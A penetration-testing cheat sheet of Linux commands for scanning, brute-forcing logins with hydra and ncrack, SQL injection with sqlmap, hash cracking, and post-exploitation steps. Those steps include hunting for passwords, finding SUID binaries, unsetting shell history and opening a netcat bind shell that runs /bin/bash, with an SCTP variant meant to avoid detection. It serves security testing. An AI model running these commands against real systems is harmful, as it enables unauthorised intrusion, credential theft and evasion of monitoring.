Penetration Testing Cheat Sheet

Terms of use

All the content and resources have been provided in the hope that it will be useful. Author do not take responsibility for any misapplication of it. The document is distributed in the hope that will be useful, but WITHOUT ANY WARRANTY.


Linux Security Audit Commands



Linux Security Audit Commands:
------------------------------------------------------------Useful commands to be used over network for Linux system
# traceroutetraceroute 8.8.8.8# traceroute using ICMPtraceroute -I 8.8.8.8
# nmap TCP syn scan, all TCP ports with scripts to all nmap output formatsnmap -sS -sV -sC -v -p- -oA all-tcp-127.0.0.1 127.0.0.1nmap -sS -sV -A -v -p- -oA all-tcp-127.0.0.1 127.0.0.1# nmap reverse DNS resolutionnmap -Pn -sn -R -oA dns-10.1.0.0_16 10.1.0.0/16# update the nmap scriptsnmap --script-updatedb# list nmap scriptsls -la /usr/share/nmap/scripts/# namp brute force scriptsnmap -vvv --script http-brute --script-args userdb=users.txt,passdb=pass.txt -p <port> <host>nmap --script vmauthd-brute -p <port> <host>nmap --script ftp-brute -p <port> <host># help for scriptnmap --script-help=ssl-heartbleed# scan using scriptnmap -sV –script=ssl-heartbleed.nse -p <port> <host># scan using set of scriptsnmap -sV --script=smb* -p <port> <host># nmap used as vulnerability scannermkdir /usr/share/nmap/scripts/vulscancd /usr/share/nmap/scripts/vulscangit clone https://github.com/scipag/vulscan.gitnmap -sV --script=vulscan/vulscan.nse 127.0.0.1
# ncrackncrack -vv --user root <host>:<port># ncrack RDPncrack -vv -U username.txt -P password.txt <host>:3389# ncrack SSHncrack -vv --user root <host>:22
# hydra# Bruteforce SSHhydra -L <user-list.txt> -P <password-list.txt> ssh://<host># Bruteforce IP router over HTTPhydra -V -l admin -P passwords.txt -t 36 -f -s 80 192.168.1.1 http-get /hydra -V -l admin -P passwords.txt -t 36 -f -s 80 http-get://192.168.1.1:8080# Bruteforce FTPhydra -V -l admin -P passwords.txt -e ns -f -s 21 192.168.1.1 ftp# Bruteforce RDPhydra -t 1 -V -f -l username -P password.lst rdp://192.168.1.1

# skipfish# basic scanskipfish -o out_dir https://www.host.com# using cookies to access authenticated pagesskipfish -o out_dir -I urls_to_scan -X urls_not_to_scan -C cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX -C cookie2=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX https://www.host.com
# wfuzz# URL brute forcingwfuzz -c -z file,Directories_Common.wordlist --hc 404 http://<host>/FUZZ.php# GET params brute forcingwfuzz -c -z file,users.txt -z file,pass.txt --hc 404 http://<host>/index.php?user=FUZZ&pass=FUZ2Z

# sqlmapsqlmap -u "http://host.com/vulnerable.php?param=12345"sqlmap -u "http://host.com/vulnerable.php?param=12345" --dbms "Microsoft SQL Server" --sql-query="select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_loginssqlmap -u "http://host.com/vulnerable.php?param=12345" --dbms "Microsoft SQL Server" --dbssqlmap -u "http://host.com/vulnerable.php?param=12345" --dbms "Microsoft SQL Server" --dump -D database -T tablesqlmap -u "http://host.com/vulnerable.php?param=12345" --cookie "cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"sqlmap -r POST.txt -p field
# My SQLmysql -u <username> -p --port <port> -h <host>mysqldump -h <host> -u <username> -p -f --port <port> --events --routines --triggers --all-databases > MySQLData.sql#
# Oraclesqlplus "username/password@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=hostname)(PORT=port))(CONNECT_DATA=(SERVER=dedicated)(SERVICE_NAME=servicename)))"
# Postgrespsql -h 127.0.0.1 db_name username
# SNMP# SNMPv1snmpwalk -mALL -v1 -cpublic <host>snmpwalk -mALL -v1 -cprivate <host>snmpget -mALL -v1 -cpublic <host> sysName.0# SNMPv2snmpwalk -v2c -cprivate <host>:<port>snmpget -v2c -cprivate -mALL <host> sysName.0 sysObjectID.0 ilomCtrlDateAndTime.0snmpset -mALL -v2c -cprivate <host> ilomCtrlHttpEnabled.0 i 1SUN-ILOM-CONTROL-MIB::ilomCtrlHttpEnabled.0 = INTEGER: true(1)# SNMPv3snmpwalk -v3 -l authPriv -u snmpadmin -a MD5 -A PaSSword -x DES -X PRIvPassWord <host>:<port> system
# LDAPldapsearch -x -b "dc=company,dc=com" -s base -h <host>LDAPTLS_REQCERT=never ldapsearch -x -D "uid=Name.Surname,OU=People,DC=Company,DC=com" -W -H ldaps://<host> -b "uid=Name.Surname,OU=People,DC=Company,DC=com" -s subldapsearch -x -p 389 -h "127.0.0.1" -b "ou=people,dc=company,dc=com" -s sub "objectClass=*"ldapsearch -x -p 1389 -h "127.0.0.1" -b "dc=company,dc=com" -s one "objectClass=*"
ldapmodify -a -h "127.0.0.1" -p 389 -D "cn=Directory Manager" -w 'password' -f modify.ldifdn: ou=people,dc=company,dc=comobjectClass: topobjectClass: organizationalunitou: people...
ldap delete -x -D "cn=Directory Manager" -w 'password' -p 1389 -h "127.0.0.1" "uid=identifier,ou=people,dc=company,dc=com"
# NFSshowmount -e 127.0.0.1mount -o ro 127.0.0.1:/ /mnt/nfs
# SSHFS# mountsshfs user@<host>:/remote/path /mnt/tmp -C -p 22# unmountfusermount -u /mnt/tmp
# redirredir --laddr=<listen_address> --lport=<listen_port> --caddr=<connect_address> --cport=<connect_port>
# sending HTTP post requestcurl --data "param1=value1&param2=value2" https://host.com/index.php
# sending SOAP request#!/bin/sh
HOST=host.comPORT=8888
nc $HOST $PORT << __EOF__POST /services/ HTTP/1.1Host: host.com:8888Content-Type: text/xml;charset=UTF-8SOAPAction: ""
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://host.com/"> <soapenv:Header/> <soapenv:Body> <web:soapRequest> </web:soapRequest> </soapenv:Body></soapenv:Envelope>
# Bash like SQL group bycat test.txt | sort | uniq -c | sort -n
# Wireshark over SSHssh root@192.168.56.101 "sudo tcpdump -U -s0 -i lo -w - 'not port 22'" | wireshark -k -i -
# HEX to PCAPxxd -r -p test.hex | od -Ax -tx1 | text2pcap - test.pcap
# Parse JSONgrep -Po '"field" : .*?[^\\]",' test.json
# tshark to Elasticsearch output./tshark -i any -f tcp -T ek -e "ip.addr" -e "tcp.port"
# tshark display filter to filestshark -r input.pcap -Y "ip.src == 10.1.1.1" -w output.pcap -F pcap
# john the ripper over GPU, OpenCL formats, start sessionjohn --session=session_name --format=opencl ~/hash.txt
# john list the GPU OpenCL formatsjohn --list=formats --format=opencl
# john the ripper, continue sessionjohn --restore=session_name
# john the ripper, show the cracked passwordsjohn ~/hash.txt --show
# dynamic formats# edit john/JohnTheRipper/run/dynamic.confjohn --fork=16 --session=session_dynamic --format=dynamic_xxxx hash.txt
------------------------------------------------------------Useful commands running locally on the Linux system.To quickly analyze the system and possibly help to escalate privileges.
# Before connecting to remote system, enable logging record the interactive session. Only after perform e.g. ssh connect.script <filename>
# loginssh username@hostname
# check current shellecho $0
# unset history fileunset HISTFILE
# check current userwhoami
# current folderpwd
# list history of the userhistory
# check systemuname -a
# check uptimeuptime
# check system variablesexport
# processesps -efps -auxfPs -auxfwww
# partitionsdf
# find in filesfind . -name "*.java" -type f -exec fgrep -iHn "textToFind" {} \;find . -regex ".*\.\(c\|java\)" -type f -exec fgrep -iHn "textToFind" {} \;find / -maxdepth 4 -name *.conf -type f -exec grep -Hn "textToFind" {} \; 2>/dev/null# SUID files owned by rootfind / -uid 0 -perm -4000 -type f 2>/dev/null# SUID files owned by root and world readablefind / -uid 0 -perm -u=s,o=r -type f -exec ls -la {} \; 2> /dev/null# SUID filesfind / -perm -4000 -type f 2>/dev/null# world writable directoriesfind / -perm -2 -type d 2>/dev/null
# find passwords in files and ignore errors and filter out the proc and other foldersfind . ! -path "*/proc/*" -type f -name "*" -exec fgrep -iHn password {} \;find . -type f \( -iname \*.conf -o -iname \*.cfg -o -iname \*.xml -o -iname \*.ini -o -iname \*.json -o -iname \*.sh -o -iname \*.pl -o -iname \*.py \) -exec fgrep -iHn password {} \; 2> /dev/null
# reverse java jar files and find passwords therefind . -name "*.jar" -type f -exec ~/jd-cli/jd-cli -oc -l -n -st {} \; | egrep -i -e "Location:" -e "password" | uniq
# check open ports and services listeningnetstat -anp
# check defined hostscat /etc/hosts
# check local IP addresses and interfacesifconfig -a
# check sudo privilegessudo -l
# check crontabcrontab -l
# check inittabcat /etc/inittab
# try to sniff traffictcpdumptcpdump not port 22 -w trace.pcap
# check known hostscat ~/.ssh/known_hosts
# try access mailshead /var/mail/root
# list groups, userscat /etc/groupcat /etc/passwd
# open netcat listener# open tcp listener and execute bash after connectnc -l -p <port> -e /bin/bash# connect to ncnc <host> <port># uset sctp instead of tcp to be less detectedwithsctp nc -l -p <port> -e /bin/bashwithsctp nc <host> <port>
# logoutlogout
# close script sessionCtrl + D
----------------------------------------------------------------------- Custom or any network protocol --------------
# Copy hex payload from wireshark of the required message
# Send hex payload over networkecho "aabbccddeeff" | xxd -r -p | nc 127.0.0.1 8080
--------------------------------------------------------------------------------- Telco related -----------------------
# svmap, send SIP OPTIONSsvmap -p5060,5061,5080-5090 10.0.0.1
# svcracksvcrack -u100 -d dictionary.txt 10.0.0.1
# SCTP proxy to send some message# SCTP payload protocol identifier will be default, not working with all serversmkfifo fifowith sctp nc -l -k -p port_local <fifo | withsctp nc 127.0.0.1 port >fifoecho "aabbccddeeff" | xxd -r -p | withsctp nc -q 1 127.0.0.1 port_local
# SSH tunnel and TCP to SCTP proxy# SCTP payload protocol identifier will be default, not working with all servers# Workstation --(SSH)--> sctp_client --(SCTP)--> sctp_server# on sctp_client executenc -l -k -p port <fifo | withsctp nc -p <source_port> <remote_sctp_server_ip> <remote_sctp_server_port> >fifossh -L port:localhost:port username@<remote_machine_running_nc># then on workstation TCP connect to localhost:port will be tunneled to remote machine over SSH and forwarded to remote_sctp_server over sctp